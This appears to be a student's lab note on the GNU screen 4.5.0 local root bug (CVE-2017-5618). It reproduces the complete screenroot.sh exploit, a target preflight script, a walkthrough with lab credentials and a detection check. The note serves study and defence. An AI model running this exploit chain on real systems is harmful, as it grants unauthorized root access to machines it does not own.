# `screen`
- [Screen](https://linux.die.net/man/1/screen) is a popular terminal multiplexer similar to `tmux`
- Version 4.5.0 has a local privesc (CVE-2017-5618, fixed in 4.5.1): the binary is commonly installed setuid root, and when asked to log (`-L`) it opens the log file with root privileges without checking whether the calling user may write to that path, so an unprivileged user can create or overwrite any file, including `/etc/ld.so.preload`
## version fingerprinting
```bash
screen -v
```
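A preflight check, added here as an example (not part of this note, `screenroot.sh` or the `screen_exploit.sh` repo), that parses the `screen -v` banner and confirms the setuid-root bit before anything is written into `/etc`. It assumes the banner format screen 4.5.0 prints, `Screen version 4.05.00 (GNU) 10-Dec-16`, and GNU coreutils `stat(1)`; the `gcc` check only tells you whether the helper binaries can be built on the target or must be copied in.

```shell
#!/bin/sh
# Preflight for the screen 4.5.0 logfile privesc.
# Added example for this note; not part of screenroot.sh or screen_exploit.sh.
# Assumes the `screen -v` banner format "Screen version 4.05.00 (GNU) 10-Dec-16"
# and GNU coreutils stat(1).

# Extract "X.YY.ZZ" from a `screen -v` banner; prints nothing if it does not match.
screen_version() {
    printf '%s\n' "$1" |
        sed -n 's/^Screen version \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p'
}

# 0 if the banner is exactly 4.05.00 (what screen 4.5.0 reports), else 1.
screen_version_vulnerable() {
    [ "$(screen_version "$1")" = "4.05.00" ]
}

# 0 if the file is owned by root and has the setuid bit. The bug only matters
# because the logfile is opened with screen's effective uid, so this is required.
is_setuid_root() {
    [ -u "$1" ] && [ "$(stat -L -c '%u' "$1" 2>/dev/null)" = "0" ]
}

# Run every check against the installed screen and report; 0 only if all pass.
preflight() {
    bin="$(command -v screen)" || { echo "[-] screen not in PATH"; return 1; }
    banner="$(screen -v 2>&1 | head -n 1)"
    ver="$(screen_version "$banner")"
    echo "[*] $bin reports version: ${ver:-unknown}"
    ok=0
    screen_version_vulnerable "$banner" \
        && echo "[+] version 4.5.0: logfile privesc applies" \
        || { echo "[-] not 4.5.0"; ok=1; }
    is_setuid_root "$bin" \
        && echo "[+] $bin is setuid root" \
        || { echo "[-] $bin is not setuid root: exploit cannot work"; ok=1; }
    command -v gcc >/dev/null \
        && echo "[+] gcc present, can build libhax.so and rootshell here" \
        || echo "[!] no gcc: build libhax.so and rootshell elsewhere and copy them in"
    return $ok
}

# Run the checks when invoked with "run", e.g.: sh preflight.sh run
if [ "${1:-}" = "run" ]; then preflight; fi
```

Run it as the low-privileged user on the target; if `is_setuid_root` fails, the logfile bug still exists but gives you nothing, because the file would be created with your own uid.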
## privesc
- Download `screen_exploit.sh`, make it executable, and run it as the low-privileged user (`sudo` is not needed and would defeat the point; the script compiles two helper binaries, so it needs `gcc` wherever it runs)
```bash
chmod +x screen_exploit.sh
./screen_exploit.sh
```
- Below is the original PoC for this vuln, `screenroot.sh` by infodox; `screen_exploit.sh` uses the same chain (build `libhax.so` and `rootshell`, write `/etc/ld.so.preload` via `screen -L`, trigger with `screen -ls`)
```bash
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
# Shared library whose constructor runs in every process the loader starts
# while /etc/ld.so.preload lists it, including the setuid screen: it makes the
# root shell setuid root, then removes the preload file so nothing else loads it.
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
# Setuid-root wrapper: set real and effective uid/gid to 0, then exec a shell.
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *argv[] = {"/bin/sh", NULL};
    execvp("/bin/sh", argv);
    return 1;
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc || exit 1
umask 000 # permissive mode for the file screen is about to create as root
# -L takes the logfile name relative to the cwd (hence cd /etc); screen opens it
# as root with no permission check and logs the command's output into it
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so the loader pulls in libhax.so as root
/tmp/rootshell
```
---
# Exercise
## initial enum
- `ping` test ![[images/Pasted image 20260207194641.png]]
- `nmap` scans ![[images/Pasted image 20260207194650.png]]
- `ssh` to target with given creds `htb-student:Academy_LLPE!` ![[images/Pasted image 20260207194831.png]]
- light internal enum on target ![[images/Pasted image 20260207194905.png]]
## run `screen_exploit.sh`
- looks like we don't have `screen_exploit.sh` on our Kali box ![[images/Pasted image 20260207194129.png]]
- let's grab it from GitHub - [GitHub - YasserREED/screen-v4.5.0-priv-escalate](https://github.com/YasserREED/screen-v4.5.0-priv-escalate) ![[images/Pasted image 20260207194514.png]]
- enum `screen` version ![[images/Pasted image 20260207194958.png]]
- run the exploit script on the Kali box: what we want from it are the two compiled binaries, `/tmp/libhax.so` and `/tmp/rootshell` (caveat: they must match the target's architecture and glibc; if `/tmp/rootshell` later fails with a glibc version error, rebuild on a closer match or with `gcc -static`) ![[images/Pasted image 20260207195810.png]]
- move to `/tmp` on Kali and host the two files over HTTP (e.g. `python3 -m http.server`) ![[images/Pasted image 20260207195833.png]]
- on the target box, pull both files from the Kali host into `/tmp`, where `libhax.so` and the preload entry expect them ![[images/Pasted image 20260207195931.png]]
- now, on the target, run the same chain the PoC uses (`-L` writes relative to the cwd, so the `cd /etc` matters)
```bash
cd /etc || exit 1
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
```
- we are now root ![[images/Pasted image 20260207200135.png]]
- navigate to `/root/screen_exploit` and `cat` the flag ![[images/Pasted image 20260207200232.png]]
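What the chain leaves behind, and how to check for it: the constructor in `libhax.so` deletes `/etc/ld.so.preload` again, but `/tmp/rootshell` stays on disk as a root-owned setuid binary, and the preload file exists on the box between the `screen -L` write and the `screen -ls` trigger. The check below is an added example (not from this note or the exploit repo): it flags preload entries outside the packaged library directories and root-owned setuid files under a directory. The file it is tested against is constructed to mirror what the exploit writes.

```shell
#!/bin/sh
# Post-exploitation / detection check for the screen 4.5.0 chain.
# Added example for this note; not part of screenroot.sh or screen_exploit.sh.

# Print every entry in an ld.so.preload-style file that is not under a system
# library directory. Returns 1 if any such entry exists, 0 if the file is absent
# or clean. Handles a final line without a trailing newline, which is exactly
# what `echo -ne "\x0a/tmp/libhax.so"` produces.
check_preload_file() {
    f="${1:-/etc/ld.so.preload}"
    [ -r "$f" ] || return 0
    bad=0
    while IFS= read -r entry || [ -n "$entry" ]; do
        case "$entry" in
            ''|'#'*) ;;                                  # blank or comment
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;  # packaged library paths
            *) echo "[!] $f preloads $entry"; bad=1 ;;
        esac
    done < "$f"
    return $bad
}

# List root-owned setuid regular files under a directory (default /tmp), which
# is where rootshell ends up after libhax.so runs chown 0:0 / chmod 04755 on it.
# Returns 1 if any are found, 0 otherwise.
find_root_suid() {
    dir="${1:-/tmp}"
    hits="$(find "$dir" -xdev -type f -perm -4000 -user root 2>/dev/null)"
    [ -z "$hits" ] && return 0
    printf '[!] root-owned setuid file(s) under %s:\n%s\n' "$dir" "$hits"
    return 1
}

# Run both checks against the live system: sh check.sh run
if [ "${1:-}" = "run" ]; then
    rc=0
    check_preload_file /etc/ld.so.preload || rc=1
    find_root_suid /tmp || rc=1
    [ "$rc" -eq 0 ] && echo "[+] no ld.so.preload or /tmp setuid indicators"
    exit "$rc"
fi
```

On a clean Linux host `/etc/ld.so.preload` normally does not exist at all, so its mere presence is worth a look; the allow-list of library directories only exists so that a legitimately configured preload does not page you.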